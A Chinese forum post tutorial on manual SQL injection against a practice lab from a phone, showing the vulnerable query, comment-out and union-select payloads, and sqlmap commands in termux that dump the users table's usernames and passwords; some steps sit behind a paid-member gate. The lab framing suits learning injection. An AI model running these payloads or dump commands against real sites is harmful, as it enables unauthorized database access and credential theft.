设为首页
收藏本站
切换到宽版
登录
立即注册
找回密码
搜索
搜索
本版
帖子
用户
快捷导航
论坛
BBS
VIP用户组
官网群
无名商城论坛
»
论坛
›
资源分享区
›
学习资源专区
›
[NB]手机端的sql注入
返回列表
发帖
查看:
222
|
回复:
0
[其他技术]
[NB]手机端的sql注入
[复制链接]
无名
无名
当前离线
积分
32464
1万
主题
1万
帖子
3万
积分
管理员
积分
32464
发消息
发表于 2022-5-8 16:22:53
|
显示全部楼层
|
阅读模式
今天去踏青,看到灵帝说该发帖了,所以再水水
打开我们的靶场,输入id=1 正常显示
我们靶场的源码是$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
我们输入id=1' --+
就相当于$sql="SELECT * FROM users WHERE id='$id'//' LIMIT 0,1";
把后面给注释掉了,这样我们就可以执行自己的语句
我们输入
本帖隐藏的内容需要
【资源会员】
才可浏览,您需要升级才可浏览,
点击这里升级【资源会员】
union select 1,version(),3 --+
//(字段是3,你也可以用order by自己慢慢试)
可以查看到数据库的靶场,当然如果需要也可以执行别的命令,这里不多讲
这时我们可以知道这个网站是存在注入点的,手机手动注入太累了,打开termux
apt install python2
git clone
本帖隐藏的内容需要
【资源会员】
才可浏览,您需要升级才可浏览,
点击这里升级【资源会员】
这是gitee加速过的,下载速度很快
然后我们cd进sqlmap目录
直接python2 sqlmap.py "
本帖隐藏的内容需要
【资源会员】
才可浏览,您需要升级才可浏览,
点击这里升级【资源会员】
-D security -T users -C password,username –dump
爆出密码和用户名
更多sqlmap命令
本帖隐藏的内容需要
【资源会员】
才可浏览,您需要升级才可浏览,
点击这里升级【资源会员】
这期的小工具是今天踏青时写的,很垃圾,所以不分享啦
我们
,
靶场
,
可以
,
sqlmap
,
注入
相关帖子
•
【FUT】iapp判断是否root实例
•
【FUT】初识? 直接怼? 。跳过初识,直接实战xml布局。
•
【FUT】 S变量
•
【解忧】深入理解Java反射
•
【LUR】各种网页挂马方式原理
•
【DMT】<web安全系列>代码审计,SQL漏洞发现
•
【FUT】VPS服务器自建SpeedTest客户端网络测速页面
•
discovermgs邮件群发协议【专业发送国外邮箱】或者163邮箱除了QQ邮箱以外都可以发送
回复
使用道具
举报
返回列表
发帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
快速回复
返回顶部
返回列表